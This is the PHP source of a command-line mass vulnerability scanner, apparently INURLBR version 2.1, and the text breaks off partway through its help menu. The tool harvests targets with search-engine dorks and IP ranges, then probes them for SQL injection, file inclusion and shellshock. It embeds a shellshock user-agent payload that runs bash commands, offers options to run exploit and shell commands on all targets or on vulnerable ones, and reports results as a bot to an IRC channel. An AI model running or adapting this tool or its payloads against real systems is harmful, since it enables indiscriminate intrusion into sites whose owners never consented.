#!/usr/bin/php -q
SQLI, LFI, LFD.
- Filter and validation based regular expression.
- Extraction of email and url.
- Validation using http-code.
- Search pages based on strings file.
- Exploits commands manager.
- Paging limiter on search engines.
- Beep sound when trigger vulnerability note.
- Use text file as a data source for urls tests.
- Find personalized strings in return values of the tests.
- Validation vulnerability shellshock.
- File validation values wordpress wp-config.php.
- Execution sub validation processes.
- Validation syntax errors database and programmin.
- Data encryption as native parameter.
- Random google host.
- Scan port.
- Error Checking & values:
[*]JAVA INFINITYDB, [*]LOCAL FILE INCLUSION, [*]ZIMBRA MAIL, [*]ZEND FRAMEWORK,
[*]ERROR MARIADB, [*]ERROR MYSQL, [*]ERROR JBOSSWEB, [*]ERROR MICROSOFT,
[*]ERROR ODBC, [*]ERROR POSTGRESQL, [*]ERROR JAVA INFINITYDB, [*]ERROR PHP,
[*]CMS WORDPRESS, [*]SHELL WEB, [*]ERROR JDBC, [*]ERROR ASP,
[*]ERROR ORACLE, [*]ERROR DB2, [*]JDBC CFM, [*]ERROS LUA,
[*]ERROR INDEFINITE
[+] Dependencies - (PHP 5.4.*):
sudo apt-get install curl libcurl3 libcurl3-dev php5 php5-cli php5-curl
[+] Play LIST TUTORIAL:
https://www.youtube.com/watch?v=jwjZUsgf9xM&list=PLV1376pVwcCmcoCmq_Z4O0ra4BqjmhIaR
+--------------------------------------------------------------------------------------+
| | | G R 3 3 T S | | |
+--------------------------------------------------------------------------------------+
* r00t-3xp10t, Jh00n, chk_, Unknownantisec, sl4y3r 0wn3r, hc0d3r, arplhmd, 0x4h4x
* Clandestine, KoubackTr, SnakeTomahawk, SkyRedFild, Lorenzo Faletra, Eclipse, shaxer
* dd3str0y3r, Johnny Deep, Lenon Leite, pSico_b0y, Bakunim_Malvadão, IceKiller, c00z
* Oystex, rH, Warflop, se4b3ar
*/
error_reporting(0);
set_time_limit(0);
ini_set('memory_limit', '256M');
ini_set('display_errors', 0);
ini_set('max_execution_time', 0);
ini_set('allow_url_fopen', 1);
(!isset($_SESSION) ? session_start() : NULL);
__OS();
/*
[+]Capturing TERMINAL VALUES.
(PHP 4 >= 4.3.0, PHP 5)getopt - Gets options from the command line argument list
http://php.net/manual/pt_BR/function.getopt.php */
$commandos_list = array(
'dork:', 'dork-file:', 'exploit-cad:', 'range:', 'range-rand:', 'irc:',
'exploit-all-id:', 'exploit-vul-id:', 'exploit-get:', 'exploit-post:',
'regexp-filter:', 'exploit-command:', 'command-all:', 'command-vul:',
'replace:', 'remove:', 'regexp:', 'sall:', 'sub-file:', 'sub-get::', 'sub-concat:',
'user-agent:', 'url-reference:', 'delay:', 'sendmail:', 'time-out:',
'http-header:', 'ifcode:', 'ifurl:', 'ifemail:', 'mp:', 'target:',
'no-banner::', 'gc::', 'proxy:', 'proxy-file:', 'time-proxy:', 'pr::',
'proxy-http-file:', 'update::', 'info::', 'help::', 'unique::', 'popup::',
'ajuda::', 'install-dependence::', 'cms-check::', 'sub-post::', 'robots::',
'alexa-rank::', 'beep::', 'exploit-list::', 'tor-random::', 'shellshock::',
'dork-rand:', 'sub-cmd-all:', 'sub-cmd-vul:', 'port-cmd:', 'port-scan:',
'port-write:', 'ifredirect:', 'persist:', 'file-cookie:', 'save-as:'
);
$opcoes = getopt('u::a:d:o:p:s:q:t:m::h::', $commandos_list);
/*
[+]VERIFYING LIB php5-curl IS INSTALLED.
(PHP 4, PHP 5) function_exists — Return TRUE if the given function has been
defined.
http://php.net/manual/en/function.function-exists.php
[+]Verification - CURL_EXEC
Execute the given cURL session.
This function should be called after initializing a cURL session and all the
options for the session are set.
http://php.net/manual/en/function.curl-exec.php */
(!function_exists('curl_exec') ? __getOut(__bannerLogo() . "{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c2"]} INSTALLING THE LIBRARY php5-curl ex: php5-curl apt-get install{$_SESSION["c0"]}\n") : NULL );
/*
[+]VERIFYING use Input PHP CLI.
(PHP 4, PHP 5) defined — Checks whether a given named constant exists
http://php.net/manual/pt_BR/function.defined.php */
(!defined('STDIN') ? __getOut(__bannerLogo() . "{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c2"]} Please run it through command-line!{$_SESSION["c0"]}\n") : NULL);
#[+]Resetting VALUES $ _SESSION ['config']
$_SESSION['config'] = array();
$_SESSION['config']['version_script'] = '2.1';
$_SESSION['config']['totas_urls'] = NULL;
$_SESSION['config']["contUrl"] = 0;
$_SESSION['config']['cont_email'] = 0;
$_SESSION['config']['cont_url'] = 0;
$_SESSION['config']['cont_valores'] = 0;
#[+] FILE MANAGEMENT EXPLOITS.
$_SESSION['config']['file_exploit_conf'] = 'exploits.conf';
#[+] FOLDER WHERE WILL BE SAVED PROCESSES.
$_SESSION['config']['out_put_paste'] = 'output/';
/*
[+]USER-AGENT EXPLOIT SHELLSHOCK
(CVE-2014-6271, CVE-2014-6277,
CVE-2014-6278, CVE-2014-7169,
CVE-2014-7186, CVE-2014-7187)
is a vulnerability in GNU's bash shell that gives attackers access to run remote
commands on a vulnerable system. */
$_SESSION['config']['user_agent_xpl'] = "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo CMD:;id; echo END_CMD:;\"";
#[+]BLACK LIST URL-STRINGS
$_SESSION['config']['blacklist'] = "//t.co,google.,youtube.,jsuol.com,.radio.uol.,b.uol.,barra.uol.,whowhere.,hotbot.,amesville.,lycos,lygo.,orkut.,schema.,blogger.,bing.,w3.,yahoo.,yimg.,creativecommons.org,ndj6p3asftxboa7j.,.torproject.org,.lygo.com,.apache.org,.hostname.,document.,";
$_SESSION['config']['blacklist'].= "live.,microsoft.,ask.,shifen.com,answers.,analytics.,googleadservices.,sapo.pt,favicon.,blogspot.,wordpress.,.css,scripts.js,jquery-1.,dmoz.,gigablast.,aol.,.macromedia.com,.sitepoint.,yandex.,www.tor2web.org,.securityfocus.com,.Bootstrap.,.metasploit.com,";
$_SESSION['config']['blacklist'].= "aolcdn.,altavista.,clusty.,teoma.,baiducontent.com,wisenut.,a9.,uolhost.,w3schools.,msn.,baidu.,hao123.,shifen.,procog.,facebook.,twitter.,flickr.,.adobe.com,oficinadanet.,elephantjmjqepsw.,.shodan.io,kbhpodhnfxl3clb4,.scanalert.com,.prototype.,feedback.core,";
$_SESSION['config']['blacklist'].= "4shared.,.KeyCodeTab,.style.,www/cache/i1,.className.,=n.,a.Ke=,Y.config,.goodsearch.com,style.top,n.Img,n.canvas.,t.search,Y.Search.,a.href,a.currentStyle,a.style,yastatic.,.oth.net,.hotbot.com,.zhongsou.com,ezilon.com,.example.com,location.href,.navigation.,";
$_SESSION['config']['blacklist'].= ".bingj.com,Y.Mobile.,srpcache?p,stackoverflow.,shifen.,baidu.,baiducontent.,gstatic.,php.net,wikipedia.,webcache.,inurl.,naver.,navercorp.,windows.,window.,.devmedia,imasters.,.inspcloud.com,.lycos.com,.scorecardresearch.com,.target.,JQuery.min,Element.location.,";
$_SESSION['config']['blacklist'].= "exploit-db,packetstormsecurity.,1337day,owasp,.sun.com,mobile10.dtd,onabort=function,inurl.com.br,purl.org,.dartsearch.net,r.cb,.classList.,.pt_BR.,github,microsofttranslator.com,.compete.com,.sogou.com,gmail.,blackle.com,boorow.com,gravatar.com,sourceforge.,.mozilla.org";
$_SESSION['config']['line'] = "\n{$_SESSION["c1"]} _[ - ]{$_SESSION["c7"]}::{$_SESSION["c1"]}--------------------------------------------------------------------------------------------------------------{$_SESSION["c0"]}";
#[+]PRINTING HELP / INFO
(isset($opcoes['h']) || isset($opcoes['help']) || isset($opcoes['ajuda']) ? __menu() : NULL);
(isset($opcoes['info']) ? __info() : NULL);
#[+]PRINTING EXPLOITS LIST.
(isset($opcoes['exploit-list']) ? print(__bannerLogo()) . __configExploitsList(1) : NULL);
#[+]CREATING DEFAULT SETTINGS EXIT RESULTS.
(!is_dir($_SESSION['config']['out_put_paste']) ? mkdir($_SESSION['config']['out_put_paste'], 0777, TRUE) : NULL);
#[+]CREATING DEFAULT SETTINGS MANAGEMENT EXPLOITS.
(!file_exists($_SESSION['config']['file_exploit_conf']) ? touch($_SESSION['config']['file_exploit_conf']) : NULL);
#[+]Deletes FILE cookie STANDARD.
(file_exists('cookie.txt') ? unlink('cookie.txt') : NULL);
#[+]REGISTRATION NEW COMMAND EXPLOIT
(not_isnull_empty($opcoes['exploit-cad']) ? __configExploitsADD($opcoes['exploit-cad']) : NULL);
#[+]Dependencies installation
(isset($opcoes['install-dependence']) ? __installDepencia() : NULL);
#[+]UPDATE SCRIPT
(isset($opcoes['update']) ? __update() : NULL);
################################################################################
#CAPTURE OPTIONS################################################################
################################################################################
#[+]VALIDATION SEARCH METHODS / (DORK,RANGE-IP)
if (not_isnull_empty($opcoes['o'])) {
$_SESSION['config']['abrir-arquivo'] = $opcoes['o'];
} else if (!not_isnull_empty($opcoes['o']) &&
!not_isnull_empty($opcoes['range']) &&
!not_isnull_empty($opcoes['range-rand']) &&
!not_isnull_empty($opcoes['dork-rand'])) {
$_SESSION['config']['dork'] = not_isnull_empty($opcoes['dork']) && is_null($_SESSION['config']['abrir-arquivo']) ? $opcoes['dork'] : NULL;
$_SESSION['config']['dork-file'] = not_isnull_empty($opcoes['dork-file']) && is_null($_SESSION['config']['abrir-arquivo']) ? $opcoes['dork-file'] : NULL;
(!not_isnull_empty($_SESSION['config']['dork']) && !not_isnull_empty($_SESSION['config']['dork-file']) ? __getOut(__bannerLogo() . "{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c2"]}DEFINE DORK ex: --dork '.asp?CategoryID=' OR --dork-file 'dorks.txt'{$_SESSION["c0"]}\n") : NULL);
}
#[+]VALIDATION GENERATE DORKS RANDOM
$_SESSION['config']['dork-rand'] = not_isnull_empty($opcoes['dork-rand']) ? $opcoes['dork-rand'] : NULL;
#[+]VALIDATION TARGET FIND PAGE
$_SESSION['config']['target'] = not_isnull_empty($opcoes['target']) && !isset($_SESSION['config']['dork']) ? $opcoes['target'] : NULL;
#[+]VALIDATION URL EXTRACTION
$_SESSION['config']['extrai-url'] = isset($opcoes['u']) ? TRUE : NULL;
#[+]VALIDATION EMAIL EXTRACTION
$_SESSION['config']['extrai-email'] = isset($opcoes['m']) ? TRUE : NULL;
#[+]VALIDATION ID SEARCH ENGINE
$_SESSION['config']['motor'] = not_isnull_empty($opcoes['q']) &&
__validateOptions('1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,e1,e2,e3,e4,e5,e6,all', $opcoes['q']) ? $opcoes['q'] : 1;
#[+]VALIDATION SAVE FILE VULNERABLE
!not_isnull_empty($opcoes['s']) && !not_isnull_empty($opcoes['save-as']) && empty($opcoes['sall']) ?
__getOut(__bannerLogo() . "{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c2"]}DEFINE FILE SAVE OUTPUT ex: -s , --save-as , --sall filevull.txt{$_SESSION["c0"]}\n") : NULL;
$_SESSION['config']['s'] = not_isnull_empty($opcoes['s']) ? $opcoes['s'] : null;
$_SESSION['config']['save-as'] = not_isnull_empty($opcoes['save-as']) ? $opcoes['save-as'] : null;
$_SESSION['config']['arquivo_output'] = not_isnull_empty($_SESSION['config']['s']) ? $_SESSION['config']['s'] : $opcoes['save-as'];
#[+]VALIDATION SAVE FILE ALL VALORES
$_SESSION['config']['arquivo_output_all'] = not_isnull_empty($opcoes['sall']) ? $opcoes['sall'] : NULL;
#[+]VALIDATION TYPE ERROR
$_SESSION['config']['tipoerro'] = not_isnull_empty($opcoes['t']) && __validateOptions('1,2,3,4,5', $opcoes['t']) ? $opcoes['t'] : 1;
#[+]VALIDATION REPLACEMENT VALUES
$_SESSION['config']['replace'] = not_isnull_empty($opcoes['replace']) ? $opcoes['replace'] : NULL;
#[+]VALIDATION SET PROXY
$_SESSION['config']['proxy'] = not_isnull_empty($opcoes['proxy']) ? $opcoes['proxy'] : NULL;
#[+]VALIDATION SET FILE WITH LIST OF PROXY
$_SESSION['config']['proxy-file'] = not_isnull_empty($opcoes['proxy-file']) ? $opcoes['proxy-file'] : NULL;
#[+]VALIDATION SET HTTP->PROXY
$_SESSION['config']['proxy-http'] = not_isnull_empty($opcoes['proxy-http']) ? $opcoes['proxy-http'] : NULL;
#[+]VALIDATION SET FILE WITH LIST OF HTTP->PROXY
$_SESSION['config']['proxy-http-file'] = not_isnull_empty($opcoes['proxy-http-file']) ? $opcoes['proxy-http-file'] : NULL;
#[+]VALIDATION SET EXPLOIT VIA REQUEST GET
$_SESSION['config']['exploit-get'] = not_isnull_empty($opcoes['exploit-get']) ? str_replace(' ', '%20', $opcoes['exploit-get']) : NULL;
#[+]VALIDATION SET EXPLOIT VIA REQUEST POST
$_SESSION['config']['exploit-post'] = not_isnull_empty($opcoes['exploit-post']) ? __convertUrlQuery($opcoes['exploit-post']) : NULL;
$_SESSION['config']['exploit-post_str'] = not_isnull_empty($opcoes['exploit-post']) ? $opcoes['exploit-post'] : NULL;
#[+]VALIDATION COMMAND SHELL STRING COMPLEMENTARY
$_SESSION['config']['exploit-command'] = not_isnull_empty($opcoes['exploit-command']) ? $opcoes['exploit-command'] : NULL;
#[+]VALIDATION MANAGEMENT COMMANDS SHELL TARGET VULN ID
$_SESSION['config']['exploit-vul-id'] = not_isnull_empty($opcoes['exploit-vul-id']) ? $opcoes['exploit-vul-id'] : NULL;
#[+]VALIDATION MANAGEMENT COMMANDS SHELL ALL TARGET ID
$_SESSION['config']['exploit-all-id'] = not_isnull_empty($opcoes['exploit-all-id']) ? $opcoes['exploit-all-id'] : NULL;
#[+]VALIDATION SET COMMANDS SHELL EXECUTE TARGET VULN
$_SESSION['config']['command-vul'] = not_isnull_empty($opcoes['command-vul']) ? $opcoes['command-vul'] : NULL;
#[+]VALIDATION SET COMMANDS SHELL EXECUTE ALL TARGET
$_SESSION['config']['command-all'] = not_isnull_empty($opcoes['command-all']) ? $opcoes['command-all'] : NULL;
#[+]VALIDATION ADDITIONAL TYPE OF PARAMETER ERROR
$_SESSION['config']['achar'] = not_isnull_empty($opcoes['a']) ? $opcoes['a'] : NULL;
#[+]VALIDATION DEBUG NIVEL
$_SESSION['config']['debug'] = not_isnull_empty($opcoes['d']) && __validateOptions('1,2,3,4,5,6', $opcoes['d']) ? $opcoes['d'] : NULL;
#[+]VALIDATION INTERNAL
$_SESSION['config']['verifica_info'] = (__validateOptions($opcoes['d'], 6)) ? 1 : NULL;
#[+]VALIDATION ADDITIONAL PARAMETER PROXY
$_SESSION['config']['tor-random'] = isset($opcoes['tor-random']) && !is_null($_SESSION["config"]["proxy"]) ? TRUE : NULL;
#[+]VALIDATION CHECK VALUES CMS
$_SESSION['config']['cms-check'] = isset($opcoes['cms-check']) ? TRUE : NULL;
#[+]VALIDATION CHECK LINKS WEBCACHE GOOGLE
$_SESSION['config']['webcache'] = isset($opcoes['gc']) ? TRUE : NULL;
#[+]VALIDATION REGULAR EXPRESSION
$_SESSION['config']['regexp'] = not_isnull_empty($opcoes['regexp']) ? $opcoes['regexp'] : NULL;
#[+]VALIDATION FILTER BY REGULAR EXPRESSION
$_SESSION['config']['regexp-filter'] = not_isnull_empty($opcoes['regexp-filter']) ? $opcoes['regexp-filter'] : NULL;
#[+]VALIDATION NO BANNER SCRIPT
$_SESSION['config']['no-banner'] = isset($opcoes['no-banner']) ? TRUE : NULL;
#[+]VALIDATION SET USER-AGENT REQUEST
$_SESSION['config']['user-agent'] = not_isnull_empty($opcoes['user-agent']) ? $opcoes['user-agent'] : NULL;
#[+]VALIDATION SET URL-REFERENCE REQUEST
$_SESSION['config']['url-reference'] = not_isnull_empty($opcoes['url-reference']) ? $opcoes['url-reference'] : NULL;
#[+]VALIDATION PAGING THE MAXIMUM SEARCH ENGINE
$_SESSION['config']['max_pag'] = not_isnull_empty($opcoes['mp']) ? $opcoes['mp'] : NULL;
#[+]VALIDATION DELAY SET PAGING AND PROCESSES
$_SESSION['config']['delay'] = not_isnull_empty($opcoes['delay']) ? $opcoes['delay'] : NULL;
#[+]VALIDATION SET TIME OUT REQUEST
$_SESSION['config']['time-out'] = not_isnull_empty($opcoes['time-out']) ? $opcoes['time-out'] : NULL;
#[+]VALIDATION CODE HTTP
$_SESSION['config']['ifcode'] = not_isnull_empty($opcoes['ifcode']) ? $opcoes['ifcode'] : NULL;
#[+]VALIDATION STRING URL
$_SESSION['config']['ifurl'] = not_isnull_empty($opcoes['ifurl']) ? $opcoes['ifurl'] : NULL;
#[+]VALIDATION SET HTTP HEADER
$_SESSION['config']['http-header'] = not_isnull_empty($opcoes['http-header']) ? $opcoes['http-header'] : NULL;
#[+]VALIDATION SET FILE SUB_PROCESS
$_SESSION['config']['sub-file'] = not_isnull_empty($opcoes['sub-file']) ? __openFile($opcoes['sub-file'], 1) : NULL;
#[+]VALIDATION SUB_PROCESS TYPE REQUEST POST
$_SESSION['config']['sub-post'] = isset($opcoes['sub-post']) ? TRUE : NULL;
#[+]VALIDATION SUB_PROCESS TYPE REQUEST GET
$_SESSION['config']['sub-get'] = isset($opcoes['sub-get']) ? TRUE : NULL;
#[+]VALIDATION SEND VULN EMAIL
$_SESSION['config']['sendmail'] = not_isnull_empty($opcoes['sendmail']) ? $opcoes['sendmail'] : NULL;
#[+]VALIDATION SHOW RANK ALEXA
$_SESSION['config']['alexa-rank'] = isset($opcoes['alexa-rank']) ? TRUE : NULL;
#[+]VALIDATION ACTIVATE BEEP WHEN APPEAR VULNERABLE
$_SESSION['config']['beep'] = isset($opcoes['beep']) ? TRUE : NULL;
#[+]VALIDATION OF SINGLE DOMAIN FILTER
$_SESSION['config']['unique'] = isset($opcoes['unique']) ? TRUE : NULL;
#[+]VALIDATION IRC SERVER/CHANNEL SEND VULN
$_SESSION['config']['irc']['conf'] = not_isnull_empty($opcoes['irc']) && strstr($opcoes['irc'], '#') ? explode("#", $opcoes['irc']) : NULL;
#[+]VALIDATION RANGE IP
$_SESSION['config']['range'] = not_isnull_empty($opcoes['range']) && strstr($opcoes['range'], ',') ? $opcoes['range'] : NULL;
#[+]VALIDATION QUANTITY RANGE IP RANDOM
$_SESSION['config']['range-rand'] = not_isnull_empty($opcoes['range-rand']) ? $opcoes['range-rand'] : NULL;
#[+]VALIDATION REMOVE STRING URL
$_SESSION['config']['remove'] = not_isnull_empty($opcoes['remove']) ? $opcoes['remove'] : NULL;
#[+]VALIDATION ACCESS FILE ROBOTS
$_SESSION['config']['robots'] = isset($opcoes['robots']) ? TRUE : NULL;
#[+]VALIDATION FILTER EMAIL STRING
$_SESSION['config']['ifemail'] = not_isnull_empty($opcoes['ifemail']) ? $opcoes['ifemail'] : NULL;
#[+]VALIDATION OPEN WINDOW CONSOLE PROCESS
$_SESSION['config']['popup'] = isset($opcoes['popup']) ? TRUE : NULL;
#[+]VALIDATION ACTIVATE SHELLSHOCK
$_SESSION['config']['shellshock'] = isset($opcoes['shellshock']) ? TRUE : NULL;
#[+]VALIDATION METHOD OF BUSTA PROGRESSIVE
$_SESSION['config']['pr'] = isset($opcoes['pr']) ? TRUE : NULL;
#[+]VALIDATION SET SUB-COMMANDS SHELL EXECUTE ALL TARGET
$_SESSION['config']['sub-cmd-all'] = isset($opcoes['sub-cmd-all']) ? TRUE : NULL;
#[+]VALIDATION SET SUB-COMMANDS SHELL EXECUTE TARGET VULN
$_SESSION['config']['sub-cmd-vul'] = isset($opcoes['sub-cmd-vul']) ? TRUE : NULL;
#[+]VALIDATION SET POR VALIDATION
$_SESSION['config']['port-cmd'] = not_isnull_empty($opcoes['port-cmd']) ? $opcoes['port-cmd'] : NULL;
#[+]VALIDATION SET SCAN PORT
$_SESSION['config']['port-scan'] = not_isnull_empty($opcoes['port-scan']) ? $opcoes['port-scan'] : NULL;
#[+]VALIDATION SET PAYLOAD XPL PORT
$_SESSION['config']['port-write'] = not_isnull_empty($opcoes['port-write']) ? $opcoes['port-write'] : NULL;
#[+]VALIDATION SET URL REDIRECT HEADER
$_SESSION['config']['ifredirect'] = not_isnull_empty($opcoes['ifredirect']) ? $opcoes['ifredirect'] : NULL;
#[+]VALIDATION SET URL REDIRECT HEADER
$_SESSION['config']['persist'] = not_isnull_empty($opcoes['persist']) ? $opcoes['persist'] : 4;
#[+]VALIDATION SET FILE COOKIE
$_SESSION['config']['file-cookie'] = not_isnull_empty($opcoes['file-cookie']) ? $opcoes['file-cookie'] : NULL;
#[+]VALIDATION SET STRING CONCAT URL SUB-PROCESS
$_SESSION['config']['sub-concat'] = not_isnull_empty($opcoes['sub-concat']) ? $opcoes['sub-concat'] : NULL;
################################################################################
#IRC CONFIGURATION##############################################################
################################################################################
if (is_array($_SESSION['config']['irc']['conf'])) {
$alph = range("A", "Z");
$_ = array(0 => rand(0, 10000), 1 => $alph[rand(0, count($alph))]);
$_SESSION['config']['irc']['my_pid'] = 0;
$_SESSION['config']['irc']['irc_server'] = $_SESSION['config']['irc']['conf'][0];
$_SESSION['config']['irc']['irc_channel'] = "#{$_SESSION['config']['irc']['conf'][1]}";
$_SESSION['config']['irc']['irc_port'] = 6667;
$_SESSION['config']['irc']['localhost'] = "127.0.0.1 localhost";
$_SESSION['config']['irc']['irc_nick'] = "[BOT]1nurl{$_[0]}[{$_[1]}]";
$_SESSION['config']['irc']['irc_realname'] = "B0t_1NURLBR";
$_SESSION['config']['irc']['irc_quiet'] = "Session Ended";
global $conf;
} elseif (!is_array($_SESSION['config']['irc']['conf']) && not_isnull_empty($opcoes['irc'])) {
__getOut(__bannerLogo() . "{$_SESSION["c1"]}[ INFO ]{$_SESSION["c0"]}{$_SESSION["c2"]}IRC WRONG FORMAT! ex: --irc 'irc.rizon.net#inurlbrasil' {$_SESSION["c0"]}\n");
}
################################################################################
#IRC CONECTION##################################################################
################################################################################
function __ircConect($conf) {
$fp = fsockopen($conf['irc_server'], $conf['irc_port'], $conf['errno'], $conf['errstr'], 30);
if (!$fp) {
echo "Error: {$conf['errstr']}({$conf['errno']})\n";
return NULL;
}
$u = php_uname();
fwrite($fp, "NICK {$conf['irc_nick']}\r\n");
fwrite($fp, "USER {$conf['irc_nick']} 8 * :{$conf['irc_realname']}\r\n");
fwrite($fp, "JOIN {$conf['irc_channel']}\r\n");
fwrite($fp, "PRIVMSG {$conf['irc_channel']} :[ SERVER ] {$u}\r\n");
return $fp;
}
################################################################################
#IRC SEND MSG###################################################################
################################################################################
function __ircMsg($conf, $msg) {
fwrite($conf['irc_connection'], "PRIVMSG ${conf['irc_channel']} :${msg}\r\n") . sleep(2);
__plus();
}
################################################################################
#IRC PING PONG##################################################################
################################################################################
function __ircPong($conf) {
while (!feof($conf['irc_connection'])) {
$conf['READ_BUFFER'] = fgets($conf['irc_connection']);
__plus();
if (preg_match("/^PING(.+)/", $conf['READ_BUFFER'], $conf['ret'])) {
__debug(array('debug' => "[ PING-PONG ]{$conf['ret'][1]}", 'function' => '__ircPong'), 6) . __plus();
fwrite($conf['READ_BUFFER'], "PONG {$conf['ret'][1]}\r\n");
($_SESSION['config']['debug'] == 6) ?
fwrite($conf['irc_connection'], "PRIVMSG ${conf['irc_channel']} :[ PING-PONG ]-> {$conf['ret'][1]}->function:__ircPong\r\n") : NULL;
}
}
}
################################################################################
#IRC QUIT#######################################################################
################################################################################
function __ircQuit($conf) {
fwrite($conf['irc_connection'], "QUIT {$conf['irc_quiet']}\r\n") . sleep(2);
__plus();
fclose($conf['irc_connection']);
}
#END IRC########################################################################
#UPDATE SCRIPT##################################################################
################################################################################
function __update() {
echo __bannerLogo();
echo "{$_SESSION["c1"]}__[ ! ] {$_SESSION["c16"]}WANT TO MAKE UPDATE SCRIPT\n{$_SESSION["c0"]}";
echo "{$_SESSION["c1"]}__[ ! ] {$_SESSION["c16"]}This can modify the current script\n{$_SESSION["c0"]}";
echo "{$_SESSION["c1"]}__[ ! ] {$_SESSION["c16"]}ARE YOU SURE ? (y \ n): {$_SESSION["c0"]}";
if (trim(fgets(STDIN)) == 'y') {
$resultado = __request_info("https://raw.githubusercontent.com/googleinurl/SCANNER-INURLBR/master/inurlbr.php", $_SESSION["config"]["proxy"], NULL);
if (not_isnull_empty($resultado['corpo'])) {
unlink('inurlbr.php');
$varf = fopen('inurlbr.php', 'a');
fwrite($varf, $resultado['corpo']);
fclose($varf);
chmod('inurlbr.php', 0777);
echo "\nUPDATE DONE WITH SUCCESS!\n";
sleep(3);
system("chmod +x inurlbr.php | php inurlbr.php");
exit();
} else {
echo system("command clear") . __bannerLogo();
echo "{$_SESSION["c1"]}__[ x ] {$_SESSION["c16"]}FAILURE TO SERVER!\n{$_SESSION["c0"]}";
}
}
}
################################################################################
#SECURITIES VALIDATION DOUBLE#####################################################
################################################################################
function not_isnull_empty($valor = NULL) {
RETURN !is_null($valor) && !empty($valor) ? TRUE : FALSE;
}
################################################################################
#MENU###########################################################################
################################################################################
function __menu() {
return system("command clear") . __getOut(__extra() . "
{$_SESSION["c1"]}_ _ ______ _ _____
| | | | ____| | | __ \
| |__| | |__ | | | |__) |
| __ | __| | | | ___/
| | | | |____| |____| |
|_| |_|______|______|_|
{$_SESSION["c1"]}[!]{$_SESSION["c0"]}Current PHP version=>[ {$_SESSION["c1"]}" . phpversion() . "{$_SESSION["c0"]} ]
{$_SESSION["c1"]}[!]{$_SESSION["c0"]}Current script owner=>[ {$_SESSION["c1"]}" . get_current_user() . "{$_SESSION["c0"]} ]
{$_SESSION["c1"]}[!]{$_SESSION["c0"]}Current uname=>[ {$_SESSION["c1"]}" . php_uname() . "{$_SESSION["c0"]} ]
{$_SESSION["c1"]}[!]{$_SESSION["c0"]}Current pwd =>[ {$_SESSION["c1"]}" . getcwd() . "{$_SESSION["c0"]} ]
" . $_SESSION['config']['line'] . "
{$_SESSION["c1"]}-h{$_SESSION["c0"]}
{$_SESSION["c1"]}--help{$_SESSION["c0"]} Alternative long length help command.
{$_SESSION["c1"]}--ajuda{$_SESSION["c0"]} Command to specify Help.
{$_SESSION["c1"]}--info{$_SESSION["c0"]} Information script.
{$_SESSION["c1"]}--update{$_SESSION["c0"]} Code update.
{$_SESSION["c1"]}-q{$_SESSION["c0"]} Choose which search engine you want through [{$_SESSION["c2"]}1...24{$_SESSION["c0"]}] / [{$_SESSION["c2"]}e1..6{$_SESSION["c0"]}]]:
[options]:
{$_SESSION["c1"]}1{$_SESSION["c0"]} - {$_SESSION["c2"]}GOOGLE / (CSE) GENERIC RANDOM / API
{$_SESSION["c1"]}2{$_SESSION["c0"]} - {$_SESSION["c2"]}BING
{$_SESSION["c1"]}3{$_SESSION["c0"]} - {$_SESSION["c2"]}YAHOO BR
{$_SESSION["c1"]}4{$_SESSION["c0"]} - {$_SESSION["c2"]}ASK
{$_SESSION["c1"]}5{$_SESSION["c0"]} - {$_SESSION["c2"]}HAO123 BR
{$_SESSION["c1"]}6{$_SESSION["c0"]} - {$_SESSION["c2"]}GOOGLE (API)
{$_SESSION["c1"]}7{$_SESSION["c0"]} - {$_SESSION["c2"]}LYCOS
{$_SESSION["c1"]}8{$_SESSION["c0"]} - {$_SESSION["c2"]}UOL BR
{$_SESSION["c1"]}9{$_SESSION["c0"]} - {$_SESSION["c2"]}YAHOO US
{$_SESSION["c1"]}10{$_SESSION["c0"]} - {$_SESSION["c2"]}SAPO
{$_SESSION["c1"]}11{$_SESSION["c0"]} - {$_SESSION["c2"]}DMOZ
{$_SESSION["c1"]}12{$_SESSION["c0"]} - {$_SESSION["c2"]}GIGABLAST
{$_SESSION["c1"]}13{$_SESSION["c0"]} - {$_SESSION["c2"]}NEVER
{$_SESSION["c1"]}14{$_SESSION["c0"]} - {$_SESSION["c2"]}BAIDU BR
{$_SESSION["c1"]}15{$_SESSION["c0"]} - {$_SESSION["c2"]}YANDEX
{$_SESSION["c1"]}16{$_SESSION["c0"]} - {$_SESSION["c2"]}ZOO
{$_SESSION["c1"]}17{$_SESSION["c0"]} - {$_SESSION["c2"]}HOTBOT
{$_SESSION["c1"]}18{$_SESSION["c0"]} - {$_SESSION["c2"]}ZHONGSOU
{$_SESSION["c1"]}19{$_SESSION["c0"]} - {$_SESSION["c2"]}HKSEARCH
{$_SESSION["c1"]}20{$_SESSION["c0"]} - {$_SESSION["c2"]}EZILION
{$_SESSION["c1"]}21{$_SESSION["c0"]} - {$_SESSION["c2"]}SOGOU
{$_SESSION["c1"]}22{$_SESSION["c0"]} - {$_SESSION["c2"]}DUCK DUCK GO
{$_SESSION["c1"]}23{$_SESSION["c0"]} - {$_SESSION["c2"]}BOOROW
{$_SESSION["c1"]}24{$_SESSION["c0"]} - {$_SESSION["c2"]}GOOGLE(CSE) GENERIC RANDOM
----------------------------------------
SPECIAL MOTORS
----------------------------------------
{$_SESSION["c1"]}e1{$_SESSION["c0"]} - {$_SESSION["c2"]}TOR FIND
{$_SESSION["c1"]}e2{$_SESSION["c0"]} - {$_SESSION["c2"]}ELEPHANT
{$_SESSION["c1"]}e3{$_SESSION["c0"]} - {$_SESSION["c2"]}TORSEARCH
{$_SESSION["c1"]}e4{$_SESSION["c0"]} - {$_SESSION["c2"]}WIKILEAKS
{$_SESSION["c1"]}e5{$_SESSION["c0"]} - {$_SESSION["c2"]}OTN
{$_SESSION["c1"]}e6{$_SESSION["c0"]} - {$_SESSION["c2"]}EXPLOITS SHODAN
----------------------------------------
{$_SESSION["c1"]}all{$_SESSION["c0"]} - {$_SESSION["c2"]}All search engines / not special motors{$_SESSION["c0"]}
Default: {$_SESSION["c1"]}1{$_SESSION["c0"]}
Example: {$_SESSION["c1"]}-q{$_SESSION["c0"]} {$_SESSION["c2"]}{op}{$_SESSION["c0"]}
Usage: {$_SESSION["c1"]}-q{$_SESSION["c0"]} {$_SESSION["c2"]}1{$_SESSION["c0"]}
